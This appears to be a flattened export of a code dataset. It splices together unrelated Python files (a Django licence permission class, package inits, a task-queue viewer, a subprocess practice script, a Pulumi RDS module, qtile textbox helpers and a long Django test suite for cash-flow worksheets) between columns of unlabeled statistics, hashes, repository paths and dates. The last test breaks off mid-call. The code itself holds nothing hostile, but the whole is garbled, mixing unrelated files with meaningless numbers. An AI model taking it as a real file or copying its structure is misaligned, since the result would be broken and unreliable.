class ItemIsOpenToViewAnnotations(BasePermission):
def has_object_permission(self, request, view, obj):
licence = obj.licence
if not licence.is_active:
return True
licence_type = licence.licence_type
return licence_type.can_view_annotation
| 29.30303
| 77
| 0.726732
| 420
| 3,868
| 6.438095
| 0.135714
| 0.134615
| 0.119083
| 0.120192
| 0.715976
| 0.715976
| 0.715976
| 0.715976
| 0.715976
| 0.715976
| 0
| 0
| 0.208376
| 3,868
| 131
| 78
| 29.526718
| 0.883083
| 0
| 0
| 0.614458
| 0
| 0
| 0.030765
| 0.025595
| 0
| 0
| 0
| 0
| 0
| 1
| 0.156627
| false
| 0
| 0.024096
| 0
| 0.542169
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 6
|
67632191d22aacd6ae3f95f94fc59722685070ad
| 138
|
py
|
Python
|
server/controller/__init__.py
|
cnavrides/wireless-debugging
|
9c057d0127a5f8eebca4193af4bdb7e96c3ae6dd
|
[
"Apache-2.0"
] | 3
|
2017-06-23T15:19:31.000Z
|
2018-03-07T01:31:37.000Z
|
server/controller/__init__.py
|
cnavrides/wireless-debugging
|
9c057d0127a5f8eebca4193af4bdb7e96c3ae6dd
|
[
"Apache-2.0"
] | 75
|
2017-06-15T20:09:32.000Z
|
2018-01-17T01:30:26.000Z
|
server/controller/__init__.py
|
cnavrides/wireless-debugging
|
9c057d0127a5f8eebca4193af4bdb7e96c3ae6dd
|
[
"Apache-2.0"
] | 3
|
2017-06-17T04:39:10.000Z
|
2017-08-16T15:25:00.000Z
|
"""
Controller Module
"""
import controller.authentication
import controller.root
import controller.sessions
import controller.websocket
| 15.333333
| 32
| 0.833333
| 14
| 138
| 8.214286
| 0.5
| 0.556522
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.094203
| 138
| 8
| 33
| 17.25
| 0.92
| 0.123188
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
677f6d09ca6f5257b42f83e501f87c0909d4c0b1
| 178
|
py
|
Python
|
examples/view_queue.py
|
n8jhj/SoonQ
|
5a2f34c98aa8020cc9c6563d6e8e274f05feda2a
|
[
"MIT"
] | null | null | null |
examples/view_queue.py
|
n8jhj/SoonQ
|
5a2f34c98aa8020cc9c6563d6e8e274f05feda2a
|
[
"MIT"
] | null | null | null |
examples/view_queue.py
|
n8jhj/SoonQ
|
5a2f34c98aa8020cc9c6563d6e8e274f05feda2a
|
[
"MIT"
] | null | null | null |
"""View info about tasks in the queue.
"""
import soonq as sq
from soonq.commands import tabulate_task_items
def view_queue():
sq.echo(tabulate_task_items(max_entries=5))
| 17.8
| 47
| 0.758427
| 29
| 178
| 4.448276
| 0.724138
| 0.186047
| 0.263566
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006579
| 0.146067
| 178
| 9
| 48
| 19.777778
| 0.842105
| 0.196629
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
67e284e26bd7c47f0d14e250b5a229501e16b50a
| 209
|
py
|
Python
|
30-Days-of-Python-master/practice_day_9/practice.py
|
vimm0/python_exercise
|
7773d95b4c25b82a9d014f7a814ac83df9ebac17
|
[
"MIT"
] | null | null | null |
30-Days-of-Python-master/practice_day_9/practice.py
|
vimm0/python_exercise
|
7773d95b4c25b82a9d014f7a814ac83df9ebac17
|
[
"MIT"
] | null | null | null |
30-Days-of-Python-master/practice_day_9/practice.py
|
vimm0/python_exercise
|
7773d95b4c25b82a9d014f7a814ac83df9ebac17
|
[
"MIT"
] | 1
|
2018-01-04T16:27:31.000Z
|
2018-01-04T16:27:31.000Z
|
import subprocess
# subprocess.call(["ls", "-l", "/etc/resolv.conf"])
# subprocess.call(["ls"])
import os
print(os.getcwd())
# '/home/user'
# os.chdir("/tmp/")
# subprocess.call(["ls"])
# os.getcwd()
# '/tmp'
| 19
| 51
| 0.61244
| 28
| 209
| 4.571429
| 0.535714
| 0.328125
| 0.375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.100478
| 209
| 11
| 52
| 19
| 0.680851
| 0.703349
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0.333333
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
db0c32a35dd2f9e5e411d879edeac9eae20dc9a5
| 740
|
py
|
Python
|
sdk/python/pulumi_aws_native/rds/__init__.py
|
AaronFriel/pulumi-aws-native
|
5621690373ac44accdbd20b11bae3be1baf022d1
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws_native/rds/__init__.py
|
AaronFriel/pulumi-aws-native
|
5621690373ac44accdbd20b11bae3be1baf022d1
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws_native/rds/__init__.py
|
AaronFriel/pulumi-aws-native
|
5621690373ac44accdbd20b11bae3be1baf022d1
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
from .. import _utilities
import typing
# Export this package's modules as members:
from ._enums import *
from .db_cluster import *
from .db_cluster_parameter_group import *
from .db_instance import *
from .db_parameter_group import *
from .db_proxy import *
from .db_proxy_endpoint import *
from .db_proxy_target_group import *
from .db_security_group import *
from .db_security_group_ingress import *
from .db_subnet_group import *
from .event_subscription import *
from .global_cluster import *
from .option_group import *
from ._inputs import *
from . import outputs
| 30.833333
| 80
| 0.774324
| 111
| 740
| 4.927928
| 0.477477
| 0.274223
| 0.219378
| 0.124314
| 0.195612
| 0.100548
| 0
| 0
| 0
| 0
| 0
| 0.001587
| 0.148649
| 740
| 23
| 81
| 32.173913
| 0.866667
| 0.274324
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
c01b1de26d27d74fa33c8e3aca130b6332927af9
| 1,073
|
py
|
Python
|
qtile/unicodes.py
|
MysteryMage/dotfiles
|
f8604b93f25502ec7a3c6d29111130f6fb7dd0d5
|
[
"MIT"
] | null | null | null |
qtile/unicodes.py
|
MysteryMage/dotfiles
|
f8604b93f25502ec7a3c6d29111130f6fb7dd0d5
|
[
"MIT"
] | null | null | null |
qtile/unicodes.py
|
MysteryMage/dotfiles
|
f8604b93f25502ec7a3c6d29111130f6fb7dd0d5
|
[
"MIT"
] | null | null | null |
from libqtile.widget.textbox import TextBox
def left_half_circle(fg_color):
return TextBox(
text='\uE0B6',
fontsize=28,
foreground=fg_color,
padding=0)
def right_half_circle(fg_color):
return TextBox(
text='\uE0B4',
fontsize=28,
foreground=fg_color,
padding=0)
def lower_left_triangle(bg_color, fg_color):
return TextBox(
text='\u25e2',
padding=0,
fontsize=50,
background=bg_color,
foreground=fg_color)
def lower_right_triangle(bg_color, fg_color):
return TextBox(
text='\u25e3',
padding=0,
fontsize=50,
background=bg_color,
foreground=fg_color)
def left_arrow(bg_color, fg_color):
return TextBox(
text='\uE0B2',
padding=0,
fontsize=22,
background=bg_color,
foreground=fg_color)
def right_arrow(bg_color, fg_color):
return TextBox(
text='\uE0B0',
padding=0,
fontsize=22,
background=bg_color,
foreground=fg_color)
| 19.87037
| 45
| 0.604846
| 126
| 1,073
| 4.912698
| 0.253968
| 0.135703
| 0.12601
| 0.193861
| 0.825525
| 0.825525
| 0.825525
| 0.710824
| 0.345719
| 0.345719
| 0
| 0.042497
| 0.298229
| 1,073
| 53
| 46
| 20.245283
| 0.779548
| 0
| 0
| 0.682927
| 0
| 0
| 0.033551
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.146341
| false
| 0
| 0.02439
| 0.146341
| 0.317073
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 6
|
c041495ed9d4e7d3b7af4fbb67843d9234178471
| 30
|
py
|
Python
|
Python/Tests/TestData/TestDiscoverer/ConfigPythonFiles/example_pt.py
|
techkey/PTVS
|
8355e67eedd8e915ca49bd38a2f36172696fd903
|
[
"Apache-2.0"
] | 404
|
2019-05-07T02:21:57.000Z
|
2022-03-31T17:03:04.000Z
|
Python/Tests/TestData/TestDiscoverer/ConfigPythonFiles/example_pt.py
|
techkey/PTVS
|
8355e67eedd8e915ca49bd38a2f36172696fd903
|
[
"Apache-2.0"
] | 1,672
|
2019-05-06T21:09:38.000Z
|
2022-03-31T23:16:04.000Z
|
Python/Tests/TestData/TestDiscoverer/ConfigPythonFiles/example_pt.py
|
techkey/PTVS
|
8355e67eedd8e915ca49bd38a2f36172696fd903
|
[
"Apache-2.0"
] | 186
|
2019-05-13T03:17:37.000Z
|
2022-03-31T16:24:05.000Z
|
def test_3():
assert True
| 10
| 15
| 0.633333
| 5
| 30
| 3.6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.045455
| 0.266667
| 30
| 2
| 16
| 15
| 0.772727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.5
| true
| 0
| 0
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
2242a44ee4dd081daa5a99cde7c6a7d081411414
| 71
|
py
|
Python
|
tests/tests/base_tests/__init__.py
|
rescbr/aws-device-farm-appium-python-tests-for-ios-sample-app
|
e006bfc830fa2dc27fe5ba630b662cd022a837c4
|
[
"Apache-2.0"
] | null | null | null |
tests/tests/base_tests/__init__.py
|
rescbr/aws-device-farm-appium-python-tests-for-ios-sample-app
|
e006bfc830fa2dc27fe5ba630b662cd022a837c4
|
[
"Apache-2.0"
] | null | null | null |
tests/tests/base_tests/__init__.py
|
rescbr/aws-device-farm-appium-python-tests-for-ios-sample-app
|
e006bfc830fa2dc27fe5ba630b662cd022a837c4
|
[
"Apache-2.0"
] | null | null | null |
from .base_test import BaseTest
from .base_tab_test import BaseTabTest
| 23.666667
| 38
| 0.859155
| 11
| 71
| 5.272727
| 0.636364
| 0.275862
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.112676
| 71
| 2
| 39
| 35.5
| 0.920635
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
225588e98a5f13e5fea3f3153e954b7a47291058
| 28,555
|
py
|
Python
|
metalacc/api/tests/test_cash_flow_worksheet.py
|
stricoff92/metalaccounting
|
6c9f650b3dd3c74c3ebbe847e0c05bb233e14153
|
[
"MIT"
] | null | null | null |
metalacc/api/tests/test_cash_flow_worksheet.py
|
stricoff92/metalaccounting
|
6c9f650b3dd3c74c3ebbe847e0c05bb233e14153
|
[
"MIT"
] | 3
|
2021-03-30T14:01:37.000Z
|
2021-06-10T19:46:42.000Z
|
metalacc/api/tests/test_cash_flow_worksheet.py
|
stricoff92/metalaccounting
|
6c9f650b3dd3c74c3ebbe847e0c05bb233e14153
|
[
"MIT"
] | null | null | null |
import datetime as dt
import json
from django.urls import reverse
from rest_framework import status
from .base import BaseTestBase
from api.models import Period, CashFlowWorksheet, Account, JournalEntryLine
class CashFlowWorksheetTests(BaseTestBase):
def setUp(self):
super().setUp()
self.client.force_login(self.user)
self.company = self.factory.create_company(self.user)
self.period = self.factory.create_period(self.company, "2020-01-01", "2020-03-31")
Account.objects.create_default_accounts(self.company)
# Create journal Entries.
# Cash for Common Stock.
self.jounral_entry_1 = self.factory.create_journal_entry(self.period, "2020-01-02")
self.je1_jel1 = self.factory.create_journal_entry_line(
self.jounral_entry_1,
Account.objects.get(name="Cash"), JournalEntryLine.TYPE_DEBIT, 50000)
self.je1_jel2 = self.factory.create_journal_entry_line(
self.jounral_entry_1,
Account.objects.get(name="Common Stock"), JournalEntryLine.TYPE_CREDIT, 50000)
# Inventory for Cash and credit.
self.jounral_entry_2 = self.factory.create_journal_entry(self.period, "2020-01-03")
self.je2_jel1 = self.factory.create_journal_entry_line(
self.jounral_entry_2,
Account.objects.get(name="Inventory"), JournalEntryLine.TYPE_DEBIT, 20000)
self.je2_jel2 = self.factory.create_journal_entry_line(
self.jounral_entry_2,
Account.objects.get(name="Cash"), JournalEntryLine.TYPE_CREDIT, 5000)
self.je2_jel3 = self.factory.create_journal_entry_line(
self.jounral_entry_2,
Account.objects.get(name="A/P"), JournalEntryLine.TYPE_CREDIT, 15000)
# Bought a Truck.
self.jounral_entry_3 = self.factory.create_journal_entry(self.period, "2020-01-04")
self.je3_jel1 = self.factory.create_journal_entry_line(
self.jounral_entry_3,
Account.objects.get(name="PPE"), JournalEntryLine.TYPE_DEBIT, 125000)
self.je3_jel2 = self.factory.create_journal_entry_line(
self.jounral_entry_3,
Account.objects.get(name="Debt: Long Term"), JournalEntryLine.TYPE_CREDIT, 120000)
self.je3_jel3 = self.factory.create_journal_entry_line(
self.jounral_entry_3,
Account.objects.get(name="Cash"), JournalEntryLine.TYPE_CREDIT, 5000)
# Sold some inventory for a profit
self.jounral_entry_4 = self.factory.create_journal_entry(self.period, "2020-01-05")
self.je4_jel1 = self.factory.create_journal_entry_line(
self.jounral_entry_4,
Account.objects.get(name="Cash"), JournalEntryLine.TYPE_DEBIT, 6500)
self.je4_jel2 = self.factory.create_journal_entry_line(
self.jounral_entry_4,
Account.objects.get(name="CoGS"), JournalEntryLine.TYPE_DEBIT, 12500)
self.je4_jel3 = self.factory.create_journal_entry_line(
self.jounral_entry_4,
Account.objects.get(name="A/R"), JournalEntryLine.TYPE_DEBIT, 10000)
self.je4_jel4 = self.factory.create_journal_entry_line(
self.jounral_entry_4,
Account.objects.get(name="Sales Revenue"), JournalEntryLine.TYPE_CREDIT, 16500)
self.je4_jel5 = self.factory.create_journal_entry_line(
self.jounral_entry_4,
Account.objects.get(name="Inventory"), JournalEntryLine.TYPE_CREDIT, 12500)
# Pay off some part of the truck
self.jounral_entry_5 = self.factory.create_journal_entry(self.period, "2020-01-06")
self.je5_jel1 = self.factory.create_journal_entry_line(
self.jounral_entry_5,
Account.objects.get(name="Debt: Long Term"), JournalEntryLine.TYPE_DEBIT, 2000)
self.je5_jel2 = self.factory.create_journal_entry_line(
self.jounral_entry_5,
Account.objects.get(name="Interest Expenses"), JournalEntryLine.TYPE_DEBIT, 200)
self.je5_jel3 = self.factory.create_journal_entry_line(
self.jounral_entry_5,
Account.objects.get(name="Cash"), JournalEntryLine.TYPE_CREDIT, 2200)
# Sold some inventory on credit
self.jounral_entry_6 = self.factory.create_journal_entry(self.period, "2020-01-07")
self.je6_jel1 = self.factory.create_journal_entry_line(
self.jounral_entry_6,
Account.objects.get(name="CoGS"), JournalEntryLine.TYPE_DEBIT, 5000)
self.je6_jel2 = self.factory.create_journal_entry_line(
self.jounral_entry_6,
Account.objects.get(name="A/R"), JournalEntryLine.TYPE_DEBIT, 7500)
self.je6_jel3 = self.factory.create_journal_entry_line(
self.jounral_entry_6,
Account.objects.get(name="Sales Revenue"), JournalEntryLine.TYPE_CREDIT, 7500)
self.je6_jel4 = self.factory.create_journal_entry_line(
self.jounral_entry_6,
Account.objects.get(name="Inventory"), JournalEntryLine.TYPE_CREDIT, 5000)
# record depreciation on truck
self.jounral_entry_7 = self.factory.create_journal_entry(
self.period, "2020-01-08", is_adjusting_entry=True)
self.je7_jel1 = self.factory.create_journal_entry_line(
self.jounral_entry_7,
Account.objects.get(name="Depreciation Expenses"), JournalEntryLine.TYPE_DEBIT, 4000)
self.je7_jel1 = self.factory.create_journal_entry_line(
self.jounral_entry_7,
Account.objects.get(name="Accumulated Depreciation"), JournalEntryLine.TYPE_CREDIT, 4000)
def tearDown(self):
super().tearDown()
def test_user_cant_create_a_cashflow_worksheet_for_a_period_if_one_already_exists_and_is_in_sync(self):
""" Test that a user cant create a cashflow worksheet if one already exists and is in sync
"""
existing_cash_flow_worksheet = self.factory.create_cashflow_worksheet(self.period)
url = reverse("period-create-cashflow-worksheet", kwargs={"slug":self.period.slug})
response = self.client.post(url, {}, format="json")
self.assertEqual(response.status_code, status.HTTP_409_CONFLICT)
def test_user_can_create_a_cashflow_worksheet_for_a_period_if_one_already_exists_and_is_not_in_sync(self):
""" Test that a out of sync worksheets are deleted when the user tries to create a new cashflow worksheet
(successfully or not)
"""
existing_cash_flow_worksheet = self.factory.create_cashflow_worksheet(self.period)
existing_cash_flow_worksheet.version_hash = "asdasdasdasd"
existing_cash_flow_worksheet.save()
original_cfw_id = existing_cash_flow_worksheet.id
url = reverse("period-create-cashflow-worksheet", kwargs={"slug":self.period.slug})
response = self.client.post(url, {}, format="json")
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
# Out of sync cash flow worksheet was deleted.
self.assertFalse(CashFlowWorksheet.objects.filter(id=original_cfw_id).exists())
def test_user_can_create_a_cashflow_worksheet_with_valid_data(self):
""" Test that a user can create a worksheet by submitting valid worksheet data.
"""
url = reverse("period-create-cashflow-worksheet", kwargs={"slug":self.period.slug})
data = [
{
# Cash for Common Stock.
'journal_entry_slug':self.jounral_entry_1.slug,
'operations':0,
'investments':0,
'finances':50000,
},{
# Inventory for Cash and credit.
'journal_entry_slug':self.jounral_entry_2.slug,
'operations':5000,
'investments':0,
'finances':0,
},{
# Bought a Truck.
'journal_entry_slug':self.jounral_entry_3.slug,
'operations':0,
'investments':5000,
'finances':0,
},{
# Sold some inventory for a profit
'journal_entry_slug':self.jounral_entry_4.slug,
'operations':6500,
'investments':0,
'finances':0,
},{
# Pay off some part of the truck
'journal_entry_slug':self.jounral_entry_5.slug,
'operations':200,
'investments':0,
'finances':2000,
},
# NON CASH TRANSACTIONS
# {
# 'journal_entry_slug':self.jounral_entry_6.slug,
# 'operations':0,
# 'investments':0,
# 'finances':0,
# },
# {
# 'journal_entry_slug':self.jounral_entry_7.slug,
# 'operations':0,
# 'investments':0,
# 'finances':0,
# },
]
self.assertEqual(CashFlowWorksheet.objects.count(), 0)
response = self.client.post(
url, json.dumps(data), content_type='application/json')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(CashFlowWorksheet.objects.count(), 1)
cfws = CashFlowWorksheet.objects.first()
self.assertEqual(cfws.period, self.period)
self.assertEqual(cfws.version_hash, self.period.version_hash)
cfws_data = cfws.worksheet_data
cfws_data = {row['journal_entry']:row for row in cfws_data}
self.assertEqual(len(cfws_data), 5)
self.assertEqual(
cfws_data[self.jounral_entry_1.slug],
{
'journal_entry':self.jounral_entry_1.slug,
'operations':0,
'investments':0,
'finances':50000,
})
self.assertEqual(
cfws_data[self.jounral_entry_2.slug],
{
'journal_entry':self.jounral_entry_2.slug,
'operations':5000,
'investments':0,
'finances':0,
})
self.assertEqual(
cfws_data[self.jounral_entry_3.slug],
{
'journal_entry':self.jounral_entry_3.slug,
'operations':0,
'investments':5000,
'finances':0,
})
self.assertEqual(
cfws_data[self.jounral_entry_4.slug],
{
'journal_entry':self.jounral_entry_4.slug,
'operations':6500,
'investments':0,
'finances':0,
})
self.assertEqual(
cfws_data[self.jounral_entry_5.slug],
{
'journal_entry':self.jounral_entry_5.slug,
'operations':200,
'investments':0,
'finances':2000,
})
def test_user_cant_create_a_cashflow_worksheet_with_extra_journal_entry_data(self):
""" Test that a user cant create a worksheet by submitted a non cash journal entry.
"""
url = reverse("period-create-cashflow-worksheet", kwargs={"slug":self.period.slug})
data = [
{
# Cash for Common Stock.
'journal_entry_slug':self.jounral_entry_1.slug,
'operations':0,
'investments':0,
'finances':50000,
},{
# Inventory for Cash and credit.
'journal_entry_slug':self.jounral_entry_2.slug,
'operations':5000,
'investments':0,
'finances':0,
},{
# Bought a Truck.
'journal_entry_slug':self.jounral_entry_3.slug,
'operations':0,
'investments':5000,
'finances':0,
},{
# Sold some inventory for a profit
'journal_entry_slug':self.jounral_entry_4.slug,
'operations':6500,
'investments':0,
'finances':0,
},{
# Pay off some part of the truck
'journal_entry_slug':self.jounral_entry_5.slug,
'operations':200,
'investments':0,
'finances':2000,
},
# (Erroneously including a NON CASH TRANSACTIONS
{
'journal_entry_slug':self.jounral_entry_6.slug,
'operations':0,
'investments':0,
'finances':0,
},
# {
# 'journal_entry_slug':self.jounral_entry_7.slug,
# 'operations':0,
# 'investments':0,
# 'finances':0,
# },
]
self.assertEqual(CashFlowWorksheet.objects.count(), 0)
response = self.client.post(
url, json.dumps(data), content_type='application/json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(CashFlowWorksheet.objects.count(), 0)
self.assertTrue(f"journal entry slug missing:{self.jounral_entry_6.slug}" in response.data)
def test_user_cant_create_a_cashflow_worksheet_when_they_leave_off_a_cash_journal_entry(self):
""" Test that a user cant create a worksheet when excluding a cash journal entry.
"""
url = reverse("period-create-cashflow-worksheet", kwargs={"slug":self.period.slug})
data = [
{
# Cash for Common Stock.
'journal_entry_slug':self.jounral_entry_1.slug,
'operations':0,
'investments':0,
'finances':50000,
},
# {
# # Inventory for Cash and credit. Erroneously EXCLUDE THIS ENTRY
# 'journal_entry_slug':self.jounral_entry_2.slug,
# 'operations':5000,
# 'investments':0,
# 'finances':0,
# },
{
# Bought a Truck.
'journal_entry_slug':self.jounral_entry_3.slug,
'operations':0,
'investments':5000,
'finances':0,
},{
# Sold some inventory for a profit
'journal_entry_slug':self.jounral_entry_4.slug,
'operations':6500,
'investments':0,
'finances':0,
},{
# Pay off some part of the truck
'journal_entry_slug':self.jounral_entry_5.slug,
'operations':200,
'investments':0,
'finances':2000,
},
# NON CASH TRANSACTIONS
# {
# 'journal_entry_slug':self.jounral_entry_6.slug,
# 'operations':0,
# 'investments':0,
# 'finances':0,
# },
# {
# 'journal_entry_slug':self.jounral_entry_7.slug,
# 'operations':0,
# 'investments':0,
# 'finances':0,
# },
]
self.assertEqual(CashFlowWorksheet.objects.count(), 0)
response = self.client.post(
url, json.dumps(data), content_type='application/json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(CashFlowWorksheet.objects.count(), 0)
self.assertTrue(f"Journal Entries missing: {self.jounral_entry_2.slug}" in response.data)
def test_user_cant_create_a_cashflow_worksheet_if_allocated_cash_is_too_low(self):
""" Test that a user cant create a worksheet when they didnt allocate enough cash for an entry
"""
url = reverse("period-create-cashflow-worksheet", kwargs={"slug":self.period.slug})
data = [
{
# Cash for Common Stock.
'journal_entry_slug':self.jounral_entry_1.slug,
'operations':0,
'investments':0,
'finances':50000,
},
{
# Inventory for Cash and credit.
'journal_entry_slug':self.jounral_entry_2.slug,
'operations':5000,
'investments':0,
'finances':0,
},
{
# Bought a Truck.
'journal_entry_slug':self.jounral_entry_3.slug,
'operations':1,
'investments':0, # NOT ENOUGH CASH ALLOCATED (1 dollar short)
'finances':4998,
},{
# Sold some inventory for a profit
'journal_entry_slug':self.jounral_entry_4.slug,
'operations':6500,
'investments':0,
'finances':0,
},{
# Pay off some part of the truck
'journal_entry_slug':self.jounral_entry_5.slug,
'operations':200,
'investments':0,
'finances':2000,
},
# NON CASH TRANSACTIONS
# {
# 'journal_entry_slug':self.jounral_entry_6.slug,
# 'operations':0,
# 'investments':0,
# 'finances':0,
# },
# {
# 'journal_entry_slug':self.jounral_entry_7.slug,
# 'operations':0,
# 'investments':0,
# 'finances':0,
# },
]
self.assertEqual(CashFlowWorksheet.objects.count(), 0)
response = self.client.post(
url, json.dumps(data), content_type='application/json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(CashFlowWorksheet.objects.count(), 0)
self.assertTrue(f"journal entry {self.jounral_entry_3.slug} has been allocated cash incorrectly" in response.data)
def test_user_cant_create_a_cashflow_worksheet_if_allocated_cash_is_too_high(self):
""" Test that a user cant create a worksheet when they allocated too much cash for an entry
"""
url = reverse("period-create-cashflow-worksheet", kwargs={"slug":self.period.slug})
data = [
{
# Cash for Common Stock.
'journal_entry_slug':self.jounral_entry_1.slug,
'operations':0,
'investments':0,
'finances':50000,
},
{
# Inventory for Cash and credit.
'journal_entry_slug':self.jounral_entry_2.slug,
'operations':5000,
'investments':0,
'finances':0,
},
{
# Bought a Truck.
'journal_entry_slug':self.jounral_entry_3.slug,
'operations':1,
'investments':5000, # TOO MUCH CASH ALLOCATED (1 dollar over)
'finances':0,
},{
# Sold some inventory for a profit
'journal_entry_slug':self.jounral_entry_4.slug,
'operations':6500,
'investments':0,
'finances':0,
},{
# Pay off some part of the truck
'journal_entry_slug':self.jounral_entry_5.slug,
'operations':200,
'investments':0,
'finances':2000,
},
# NON CASH TRANSACTIONS
# {
# 'journal_entry_slug':self.jounral_entry_6.slug,
# 'operations':0,
# 'investments':0,
# 'finances':0,
# },
# {
# 'journal_entry_slug':self.jounral_entry_7.slug,
# 'operations':0,
# 'investments':0,
# 'finances':0,
# },
]
self.assertEqual(CashFlowWorksheet.objects.count(), 0)
response = self.client.post(
url, json.dumps(data), content_type='application/json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(CashFlowWorksheet.objects.count(), 0)
self.assertTrue(f"journal entry {self.jounral_entry_3.slug} has been allocated cash incorrectly" in response.data)
def test_user_cant_create_a_cashflow_worksheet_for_another_users_period(self):
""" Test that a user can create a worksheet by submitting valid worksheet data.
"""
self.client.force_login(self.other_user)
url = reverse("period-create-cashflow-worksheet", kwargs={"slug":self.period.slug})
data = [
{
# Cash for Common Stock.
'journal_entry_slug':self.jounral_entry_1.slug,
'operations':0,
'investments':0,
'finances':50000,
},{
# Inventory for Cash and credit.
'journal_entry_slug':self.jounral_entry_2.slug,
'operations':5000,
'investments':0,
'finances':0,
},{
# Bought a Truck.
'journal_entry_slug':self.jounral_entry_3.slug,
'operations':0,
'investments':5000,
'finances':0,
},{
# Sold some inventory for a profit
'journal_entry_slug':self.jounral_entry_4.slug,
'operations':6500,
'investments':0,
'finances':0,
},{
# Pay off some part of the truck
'journal_entry_slug':self.jounral_entry_5.slug,
'operations':200,
'investments':0,
'finances':2000,
},
# NON CASH TRANSACTIONS
# {
# 'journal_entry_slug':self.jounral_entry_6.slug,
# 'operations':0,
# 'investments':0,
# 'finances':0,
# },
# {
# 'journal_entry_slug':self.jounral_entry_7.slug,
# 'operations':0,
# 'investments':0,
# 'finances':0,
# },
]
# other user has no access
self.assertEqual(CashFlowWorksheet.objects.count(), 0)
response = self.client.post(
url, json.dumps(data), content_type='application/json')
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
# owner can create
self.client.force_login(self.user)
response = self.client.post(
url, json.dumps(data), content_type='application/json')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_user_cant_create_a_cashflow_worksheet_with_journal_entries_from_another_period(self):
""" Test that a user cant create a worksheet for period A by submitting Journal entries from period B.
"""
# Pay off some part of the truck in another period
other_period = self.factory.create_period(self.company, "2020-04-01", "2020-06-30")
other_jounral_entry = self.factory.create_journal_entry(other_period, "2020-04-06")
other_jel_1 = self.factory.create_journal_entry_line(
other_jounral_entry,
Account.objects.get(name="Debt: Long Term"), JournalEntryLine.TYPE_DEBIT, 1000)
other_jel_2 = self.factory.create_journal_entry_line(
other_jounral_entry,
